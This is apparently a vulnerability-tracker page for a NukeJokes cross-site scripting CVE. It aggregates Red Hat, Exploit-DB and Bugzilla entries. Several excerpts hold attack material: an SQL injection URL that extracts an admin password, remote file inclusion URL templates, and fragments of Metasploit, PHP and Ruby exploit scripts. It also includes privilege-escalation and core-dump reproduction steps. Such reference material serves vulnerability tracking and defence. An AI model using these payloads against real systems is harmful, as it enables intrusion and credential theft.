CVE-2004-2007
Published: 2004-05-08
Priority: P417 (medium) · CVSS 2.0 base score 4.3 · vector AV:N/AC:M/Au:N/C:N/I:P/A:N
Flags: EXPLOIT
EPSS: 1.75% (75.1th percentile)
Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adam_webb | nukejokes | — | — |
| adam_webb | nukejokes | — | — |
CVSS provenance
- nvd: v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
- vendor_redhat: 10.0 CRITICAL
GHSA
GHSA-6x86-v9c9-p52j: Cross-site scripting (XSS) vulnerability in modules
ghsa_unreviewed · 2022-04-29 · CVE-2004-2007 [MEDIUM]
Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function.
Red Hat
CVE-2007-3375 [CRITICAL] lhaca issue might affect lha packages
vendor_redhat · 2007-07-01 · CVSS 10.0
Stack-based buffer overflow in Lhaca File Archiver before 1.21 allows user-assisted remote attackers to execute arbitrary code via a crafted LZH archive, as exploited by malware such as Trojan.Lhdropper.
Statement: Not vulnerable, Red Hat do not ship the Lhaca file archiver. Note that an identical flaw was found affecting the lha file archiver in 2004, CVE-2004-0234. This issue was corrected by security update RHSA-2004:178 for Red Hat Enterprise Linux 2.1 and 3. Red Hat Enterprise Linux 4 was not vulnerable as it contained a backported patch to correct this issue from release.
Red Hat
CVE-2007-0958 [LOW] core-dumping unreadable binaries via PT_INTERP
vendor_redhat · 2007-01-26 · CVSS 2.1
Linux kernel 2.6.x before 2.6.20 allows local users to read unreadable binaries by using the interpreter (PT_INTERP) functionality and triggering a core dump, a variant of CVE-2004-1073.
Red Hat
CVE-2007-3008 [MEDIUM] Mbedthis AppWeb before 2
vendor_redhat · CVSS 5.8
Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.
Statement: The Apache Software Foundation do not treat this as a security issue. A configuration change can be made to disable the ability to respond to HTTP TRACE requests if required.
For more information please see:
http://www.apacheweek.com/issues/03-01-24#news
No detection rules found.
Exploit-DB
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb · 2011-04-11
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Exploit-DB
CVE-2007-1689 Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb · 2010-05-09
---
##
# $Id: nis2004_get.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX
Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.
By sending a overly long string to the "Get()" method, an attacker may be
able to execute arbitrary code.
Exploit-DB
CVE-2004-1585 3Com OfficeConnect Routers - Remote Denial of Service
exploitdb · 2009-12-19
---
###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu)
#
# Exploit language -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - I tested it on another similar 3Com router and the system does not crash, but the Internet connection does.
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############
require "socket"
host = ARGV[0]
buffer = "A"
send = ""
puts ""
if !host
puts " 3Com OfficeConnect
Exploit-DB
CVE-2008-0464 Aconon Mail 2004 - Directory Traversal
exploitdb · 2008-01-23
---
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected platforms: every platform Aconon runs on (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature-rich web interface for both users and administrators. This
includes a publicly available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The template used may be overwritten by any user by modifying the
HTTP GET "template" form parameter. This parameter is checked against
code injection, but not against directory traversal.
Proof of Concept:
http://www.aco
Exploit-DB
CVE-2007-4442 Epic Games Unreal Engine Logging Function - Remote Denial of Service
exploitdb · 2007-08-20
---
source: https://www.securityfocus.com/bid/25374/info
The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input.
Successfully exploiting this issue allows remote attackers to corrupt application memory in a manner that causes a crash. Remote code execution may be possible, but this has not been confirmed.
Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 are vulnerable. Given the reuse of the engine in multiple other products, other games and versions are also likely vulnerable.
This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may a
Exploit-DB
CVE-2004-2466 EFS Easy Chat Server 2.2 - Remote Denial of Service
exploitdb · 2007-08-14
---
# milw0rm.com [2007-08-14]
Exploit-DB
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
exploitdb · 2007-04-10
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
// Hex/ASCII dump helper: renders a string as two blocks, hex bytes and printable
// characters (non-printables shown as "."), 15 bytes per line.
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    {$result.=" .";}
    else
    {$result.=" ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
    {$exa.=" ".dechex(ord($string[$i]));}
    else
    {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
CVE-2004-1552 AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb · 2007-03-22
---
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
Exploit-DB
CVE-2007-1483 WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
exploitdb · 2007-03-15
---
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://l
Exploit-DB
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb · 2007-03-09
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
CVE-2007-1060 SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion
exploitdb · 2007-02-20
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_66$2007
[ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability
Author : M.Hasran Addahroni
Date : Feb, 20th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv66-K-159-2007.txt
Critical Lvl : Dangerous
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SendStudio
version : <= 2004.14
URL : http://www.interspire.com/sendstudio/
Description :
SendStudio is PHP email marketing software that lets you create, send and track an unlimited number of email messages and autoresponders. Over
Exploit-DB
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb · 2007-01-29
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb · 2006-10-06
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
CVE-2004-2007 Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities
exploitdb · 2004-05-08
---
source: https://www.securityfocus.com/bid/10306/info
It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input.
Multiple SQL injection issues exist due to a failure of the application to do any sanitization on user input prior to using the offending input in an SQL query.
These SQL issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data.
Multiple cross-site scripting vulnerabilities have been reported to exist d
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb · 2001-06-21
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb · 2001-06-21
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Bugzilla
CVE-2007-3375 [CRITICAL] lhaca issue might affect lha packages
bugzilla · 2007-07-10 · CVSS 10.0
CERT notified us of a flaw in Lhaca LHA Extended Header handling, but on closer
look at the advisory this looks really similar to the code in header.c in lharc
as distributed in older RHEL releases.
http://vuln.sg/lhaca121-en.html
We need to look through the lharc code for older RHEL to make sure it is not
vulnerable to this issue.
Marking this bug as private for now, as it isn't public that this might affect
lharc too.
Discussion:
This is fixed in Red Hat packages by lha-114i-sec.patch.
Investigation showed that this was in fact the issue from 2004:
http://marc.info/?l=bugtraq&m=108422737918885&w=2 CVE-2004-0234
So LHACA appeared to be vulnerable to this issue due to shared codebase.
Bugzilla
CVE-2007-3555 [MEDIUM] moodle cross site scripting vulnerability
bugzilla · 2007-07-09 · CVSS 4.3
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3555
"Cross-site scripting (XSS) vulnerability in index.php in Moodle 1.7.1 allows
remote attackers to inject arbitrary web script or HTML via a style expression
in the search parameter, a different vulnerability than CVE-2004-1424."
Appears to affect 1.6.x and 1.8.x too:
http://eduspaces.net/moodlenews/weblog/181794.html
http://download.moodle.org/stable18/CHANGES
http://download.moodle.org/stable16/CHANGES
Discussion:
Built 1.8.2 for rawhide, which addresses this. Will push to 7, etc after testing.
---
moodle-1.8.2-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla
CVE-2007-0958 [LOW] core-dumping unreadable binaries via PT_INTERP
bugzilla · 2007-06-08 · CVSS 2.1
CVE-2004-1073 is still an issue -- a patched PoC can still cause a
coredump of a non-readable binary such as /usr/bin/sudo; PoC attached;
the tweak in question is adding:
eph.p_memsz = 4097;
Run "./poc /usr/bin/sudo" and a "core" spits out -- WFM on a 2.6.17.x
kernel.
To reproduce, do
* grab poc at the end of advisory.
* add line "eph.p_memsz = 4096;" after "eph.p_filesz = 4096;"
where first "4096" is something equal to or greater than 4096.
* ./poc /usr/bin/sudo && ls -l
Here I get:
-rw------- 1 ad ad 102400 2007-01-15 19:17 core
---s--x--x 2 root root 101820 2007-01-15 19:15 /usr/bin/sudo
Check for MAY_READ as binfmt_misc.c does.
Discussion:
committed in stream rhel-4.5.z build 55.0.1
---
An advisory has been issued
Bugzilla
CVE-2007-0958 [LOW] core-dumping unreadable binaries via PT_INTERP
bugzilla · 2007-02-23 · CVSS 2.1
+++ This bug was initially created as a clone of Bug #228886 +++
CVE-2004-1073 is still an issue -- PoC can still cause a coredump of a
non-readable binary such as /usr/bin/sudo; PoC attached; the tweak in question
is adding:
eph.p_memsz = 4097;
Run "./poc /usr/bin/sudo" and a "core" spits out -- WFM on a 2.6.17.x kernel.
-- Additional comment from [email protected] on 2007-02-15 14:07 EST --
Created an attachment (id=148136)
Proposed upstream patch
-- Additional comment from [email protected] on 2007-02-23 14:04 EST --
This request was evaluated by Red Hat Product Management for inclusion in a Red
Hat Enterprise Linux maintenance release. Product Management has requested
further review of this request by Red Hat Engine
References:
http://marc.info/?l=bugtraq&m=108404714232579&w=2
http://www.securityfocus.com/bid/10306
http://www.waraxe.us/index.php?modname=sa&id=28
https://exchange.xforce.ibmcloud.com/vulnerabilities/16096
Published: 2004-05-08